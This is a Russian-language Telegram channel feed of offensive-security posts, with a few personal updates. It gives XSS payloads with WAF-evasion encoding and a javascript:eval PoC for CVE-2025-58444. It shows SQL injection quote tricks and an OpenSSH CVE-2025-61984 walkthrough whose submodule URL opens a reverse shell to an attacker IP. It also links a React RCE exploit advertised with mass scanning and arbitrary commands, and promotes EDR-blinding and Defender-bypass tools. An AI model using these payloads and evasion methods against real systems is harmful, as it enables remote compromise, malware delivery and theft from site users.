Посты J – Telegram
Посты J
468 subscribers
165 photos
18 videos
1 file
54 links
Не джипичи пабл
Download Telegram
Please open Telegram to view this post
VIEW IN TELEGRAM
👍52
Посты J
Photo
Дорогие друзья.
На самом деле есть и более крутые способы доставки, чем заморачиваться с ttl
И полно различных интересных фишек хакинге, о которых знают не многие или знает только сам автор.

Как видите, к сожалению времени у меня очень мало.
В планах был пост, разобрать от А до Я атаку на Аэрофлот. Исходя от полученных данных, сообщений атакующих и т.п, поднял лабораторию и симулировать атаку. В целом лабу поднял, настроил ad, для интереса потом пришла идея ханипоты расставить, чтобы показать как их определять для атакующего и как определять самого атакующего и его планы. Это было очень полезно и познавательно. Надеюсь найду на это время.

Кроме того, у меня есть сложный проект для red team, над которым работаю. Этот инструмент может не только дать мощный буст для красных, но и быстро поднять новичков до приличного уровня и симулировать атаки более эффективно и с большей вероятностью успеха, как если бы это была какая нибудь apt группа.

Я не хочу раскрывать все или важные карты, которые могут уйти в хайп, в котором автор окажется неизвестным или присвоен кем то другим.

Это всё не приносит мне никакого дохода. Пока что.
Я бы открыл онлайн обучения, но это опять гемор составлять план, адаптироваться под каждого. Помимо этого у меня есть ещё основная работа.

Думаю лучший способ сохранить авторство - это написать книгу.

Если у вас есть идеи для содержания книги, буду очень рад если напишите в комментариях, а я постараюсь доработать эту тему до своего максимума.
👍72
Посты J
Если кому интересно, то на видео в дело идёт этот инструмент: https://github.com/0x4m4/hexstrike-ai
Честно? Не рекомендую.
Смысл от того, что за вас будет это делать ИИ?

По такой логике можно открыть готовый пост в Хабре, просто прочесть и пойти спать.
Тут так же за вас всё делают, дают флаг и идёте спать.
👍5
XSS довольно популярная уязвимость, но последнее время встречается всё реже, а если и найдётся, эксплуатация может оказаться непростой.
А простые попытки стали реже встречаться благодаря CSP, Trusted Types и современным WAF.

Новые технологии безопасности браузера, а так же WAF значительно усложняют атаку.
Кроме того, современные веб приложения, перестают использовать куки, в пользу хранилища.

А сами PoC, выглядят, например так:
%3Cnoscript%20xmlns%3D%22http%3A%2F%http://2Fwww.w3.org%2F2000%2Fnoscript%22%3E%3Cnoscript%3Eprompt%28%22XSS%22%29%3C%2Fnoscript%3E%3C%2Fnoscript%3E

Подобное кодирование url используется в частности для обхода фильтра и waf. В некоторых WAF довольно строгая функция декодировании и может выдать ошибку или вообще не проверить, если синтаксис не совпадает. Следовательно полезная нагрузка едет дальше.
Без url кодировки будет выглядеть вот так:
<noscript xmlns="http://www.w3.org/2000/noscript"><noscript>prompt("XSS")</noscript></noscript>

То есть... Всё предельно очевидно и любая система обычно с таким справляется.

Есть такой вариант:
{
"authorization_endpoint": "javanoscript:eval(atob('...'));//",
}

Где "...", там JavaScript в base64. Декодируется в js и исполняет через eval, а // в конце комментирует всё остальное, чтобы для полезной нагрузки не имела никакого значения и влияния.

Это PoC для CVE-2025-58444 и как ожидается, тут нет никаких серьезных мер безопасности, которые препятствовали бы эксплуатации уязвимости. (Т.е без всякой обфускации, прямо вызывает eval)
Современные EDR/XDR системы заругаются на такое поведение. Хоть это и серьезная уязвимость в конфигурации OAuth, но она имеет смысл только если атакующий может подменить этот документ для клиента.

В качестве PoC они выглядят очень простыми, но при реальных атаках, необходимо самому дописывать, для достижения необходимых задач. В случае xss - это может быть не только угон сессий, но и даже заражения компьютера пользователей, залив троян, под ошибкой, что браузер необходимо срочно обновить.

@jpubl 🤓
Please open Telegram to view this post
VIEW IN TELEGRAM
8👍4🐳3
Я пока заграницей и пока нет возможности писать посты до ~8 числа.

Поэтому время от времени буду присылать уже готовые, но годные публикации.
__
🚬 Руководство по взлому зашифрованных сеансов SSH от братушек китаюшек.

Современный взгляд, новые инструменты на основе старых, в общем интересно.

😊 Читать: https://mp.weixin.qq.com/s/ap3iUBkctCCvNx7KYHi0mA

@jpubl
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
9👍5🐳11
Forwarded from Похек
Adaptix C2 и Cobalt Strike: сравнительный аналитический обзор для специалистов по кибербезопасности
#adaptix #cobalt #C2 #redteam #IoC

Я учёл последнии комментарии, что контент на канале скатился, поэтому давайте вместе make Poxek great again)

➡️Введение
В современной экосистеме инструментов пост-эксплуатации наблюдается устойчивый тренд: сдвиг от закрытых коммерческих решений к гибким open-source C2-фреймворкам. Если в 2010-х годах доминировали продукты уровня Cobalt Strike и Metasploit Pro, то в середине 2020-х активно появляются проекты нового поколения — такие как Adaptix C2.

➡️Обзор Adaptix C2

▪️Архитектура
Серверная часть: написана на Go, что обеспечивает кроссплатформенность, простоту деплоя и высокую производительность.
- Клиентская часть: Qt/C++ приложение, работающее на Windows, Linux и macOS. Это делает управление C2 доступным с разных ОС, в отличие от ряда конкурентов.
- Модульность: поддержка кастомных агентов и расширений. Ориентация на расширяемость позволяет создавать собственные плагины, команды и интеграции.

▪️Особенности
Open-source модель — прозрачный код облегчает аудит и кастомизацию, но открывает злоумышленникам доступ к функционалу.
- Активное сообщество — развивается быстрее, чем многие закрытые проекты.
- Применимость — используется как в легитимных Red Team-операциях, так и уже фиксируется в реальных инцидентах.

🔗blog.poxek

🌚 @poxek | MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
Please open Telegram to view this post
VIEW IN TELEGRAM
👍43
👊 Взлом защиты Windows Defender с помощью трюка с переадресацией папок.

Читать: https://habr.com/ru/articles/951354/


_
Стамбул довольно красивый город и интересный, но тут всё очень дорого по сравнению в России.
Из недорогих тут одежда и всякие безделушки. Что касается еды, я мог войти в столовку/забегаловку и поесть досыта за 300-400₽ от души. А тут картофель фри средней порции стоит около (~300 лир)500-600₽.
В целом кухня неплохая, в некоторых местах очень вкусно, а в некоторых дорого и невкусно.
В общем, тут приятно проводить время, но не жить.

Пока так длится мой отдых.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍842
Сегодня Дурову 41, а мне 26 😔
Please open Telegram to view this post
VIEW IN TELEGRAM
114
💪 Сегодня напишу ещё один пост, просвещенный мелочам, которые выглядят безобидно, но могут вызвать критические проблемы, а так же приведу актуальные примеры.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍133
🪞 Перенос строки? Встречается каждый день? Обращаете внимание из чего он состоит и как он работает?

Если и да, даже самые опытные разработчики могут забыть о том, насколько он важен. Да и не только он.

🪞 Например он может сломать js. Часто замечали как загружаемом сайтом js, имеет текст в одну длинную строку? Как думаете, чтобы будет если туда добавить перенос строки? Например будет у нас имя пользователя "hello%0a world", или "hello\n world", или "hello\u00a world".
Если один вариантов прокатит, получим такой результат:
var char_source = "hello
world";

😭 Это будет синтаксическая ошибка. Если получили перенос строки, это громкий сигнал.
⚔️ При необходимости можно попробовать использовать url code/unicode/спец символы или комбинируя, а этак же дополнительно(т.е ещё раз) используя url code. А так же использовать нулевой байт(%00) или нулевая ширина пробела(&#x200b;, &#xfeff;, \uFEFF) для попытки обхода waf.

💰 Так же можно указать "Content-Length:3" в заголовке запроса, так как есть шанс что waf учтет это и прочтёт только первые 3 значения. А некоторые имеют определенную длину для проверки по умолчанию, поэтому полезно добавить ооооочень много мусора перед полезной нагрузкой.

😣 Что касается нулевого байта, это старый метод, но иногда работает. Это буквально стоп сигнал. Если повезёт, строка дальше читаться не будет,а полезна нагрузка пойдет дальше. Раньше использовался очень часто и был очень популярен.

🔫 Аналогично и с остальными атаками. Включая SQL injection. Некоторые ноют что он неактуален. Просто не слушайте их. Пока существует SQL - существует и инъекция. Сейчас существуют очень мощные фильтры, но не все являются такими страшными. Поэтому в некоторых случаях можно использовать например %22, чтобы закрыть кавычку:
SELECT name FROM city_list where city = "Berlin%22 OR city = %22Lyon";
# как итог
SELECT name FROM city_list where city = "Berlin" OR city = "Lyon";

🥪 Конечно есть метод вставки. Которые практически абсолютно спасает от классических sql injection.
SELECT ... FROM ... WHERE city = ?;

💞 Где "?", значение автоматически вставляется как строка. Т.е СУБД строго трактует эти данные как литеральные значения.
👊 НО.... Он не работает по отношению к другим параметрам, как SELECT, ORDER BY или FROM и так далее. Поэтому, если значение какое то попадает туда, то привязка к "?", тут не поможет. Тут уже фильтруй ручками)

💊 А теперь к десерту... (Продолжение следует)

@jpubl 🎁
Please open Telegram to view this post
VIEW IN TELEGRAM
👍85
Посты J
🪞 Перенос строки? Встречается каждый день? Обращаете внимание из чего он состоит и как он работает? Если и да, даже самые опытные разработчики могут забыть о том, насколько он важен. Да и не только он. 🪞 Например он может сломать js. Часто замечали как…
Часть 2.

🤭Проблема у OpenSSH как говорят... CVE-2025-61984 - так его называют.

✏️ Суть в том, что когда клонируешь репозиторий, это происходит либо по ssh, либо по https. Проблема может возникнуть когда за выбором стоит ssh с проблемным конфигом. А теперь к деталям.
😱 Вся история начинается в файле ~/.ssh/config
Который выглядит например так:
Host *.example.com
ProxyCommand bash -c 'nc %r@%h %p'

😳То есть, для подключений к гитхаб через SSH используется прокси-команда.
• %r - имя пользователя
• %h - адрес
• %p - порт

🎒 Далее картина в файле .gitmodules с подмодулем, который находится в репозитории.
Он может иметь параметр url.

🦈 Для начала убедимся, что готовы принять подключение от реверсшелла:
nc -l 4444

👺 Сам url, должен иметь полезную нагрузку:
url=ssh://$[+\nbash -i >& /dev/tcp/<IP>/4444 0>&1\n@foo.example.com:foo

👀Или %0a вместо \n

Как это работает?
OpenSsh ожидает url, но url является нестандартным(из-за $[ ), из-за чего возникает синтаксическая ошибка.

🤗 И тут в дело вступает "\n", он разбивает команду, позволяя выполнить полезную нагрузку, который в даёт удаленный доступ.

👮 Даже несмотря на самые строгие фильтры, OpenSSH упустила этот момент. Либо недооценили козявку, либо не знали)

@jpubl - просто простые посты 🚬
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3211
Есть довольно неплохое колличество различных CTF (например root-me.org) где можно набраться опыта в поиске и эксплуатации xss и узнать каких видов они бывают.

Но стоит делать упор больше сначала на js и тому, какими методами его можно вызвать, а не только за счёт тега noscript, но и за счёт ссылок, атрибутов и прочих файлов, которые поддерживают js(например SVG, которая может показаться безобидной картинкой).
Затем на методы обфускации и кодировки, для обхода фильтров.

Потенциал у xss довольно большой. И заключается не только в угоне сессий. Угон сессий за счёт xss скорее популярное явление, но его можно использовать для подключения рекламных уведомлений, дефейса, если страница имеет разрешение к микрофону или к камере, то свободное использование без запроса на них, заражение компьютера трояном и т.д
👍65
Owasp top 10 этого года, выдал в свой топ новую категорию. Об этом(А10) я ранее уже писал:
https://news.1rj.ru/str/jpubl/235


Но вот инъекции падают с 3й строчки, на 5ю. Вероятно это связано с появлением ИИ, который показал многим дилетантом, безопасные методы вставки(например при SQL injection), тем не менее, это не исключает возможность существования, а так же другие виды инъекций, благодаря которым распространяются ботнеты.

А03, тоже новая, расширенная категория. Заражённые репы, библиотеки, контейнеры и т.п, объединившись с уязвимыми и устаревшими компоненты ворвались аж до А03

Пост получился краткий, возможно позже распишу подробнее и с примерами.
👍7
Forwarded from j
Только представьте. Создаёте поддельную точку. Но мимо проходящий человек неожиданно начинает бить вам морду.

Как это так получилось?
Всё просто. Жертва отследила вас по уровню сигнала)))
7
This media is not supported in your browser
VIEW IN TELEGRAM
Максимально простой и лёгкий socks5 прокси клиент, который буквально работает в пару кликов и улучшает пинг в играх(при правильном выборе сервиса). Абсолютно никакого дискомфорта, никаких требований и т.д. Легко, просто и быстро.

Это мой авторский инструмент для одного проекта, но решил вырезать от туда, чтобы был доступен и всем остальным. 😊



Оставлю в комментариях
Please open Telegram to view this post
VIEW IN TELEGRAM
👍64
Рабочий PoC RCE в React CVE-2025-55182
https://github.com/ejpir/CVE-2025-55182-poc — тут добавилось эксплуатация через gadgets
На случай удаления ориг репы https://github.com/szybnev/CVE-2025-55182-poc. В свою версию добавил масс скан через -l и сохранение результато в txt -o, а ещё --cmd для запуска произвольных команд

Схема атаки:
  HTTP POST /formaction

decodeAction(formData, serverManifest) [server.js:111]

loadServerReference(serverManifest, "vm#runInThisContext", ["CODE"])

resolveServerReference() → парсит "vm#runInThisContext" → metadata = [vmId, [], "runInThisContext"]

requireModule(metadata)

moduleExports["runInThisContext"] ← БЕЗ hasOwnProperty проверки!

vm.runInThisContext.bind(null, "CODE")

При вызове: vm.runInThisContext("CODE") → RCE!


Patch:
  Уязвимый код (v19.0.0):
// ReactFlightClientConfigBundlerWebpack.js
return moduleExports[metadata[NAME]]; // Строка ~255

Фикс (v19.2.1):
if (hasOwnProperty.call(moduleExports, metadata[NAME])) {
return moduleExports[metadata[NAME]];
}
return (undefined: any);
Forwarded from Freedom Fox 🏴‍☠
EDR-Redir

Инструмент для редиректа директории #EDR (Endpoint Detection and Response) в другое место. Предотвращает/нарушает работу служб и процессов EDR ;)

Протестировано:
• Microsoft Windows Defender
• Elastic Defend
• Sophos Intercept X

Читать подробнее:
https://www.zerosalarium.com/2025/10/DR-Redir-Break-EDR-Via-BindLink-Cloud-Filter.html
https://www.zerosalarium.com/2025/11/EDR-Redir-V2-Blind-EDR-With-Fake-Program-Files.html

#redteam #работягам

Telegram  ✉️ @freedomfox
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2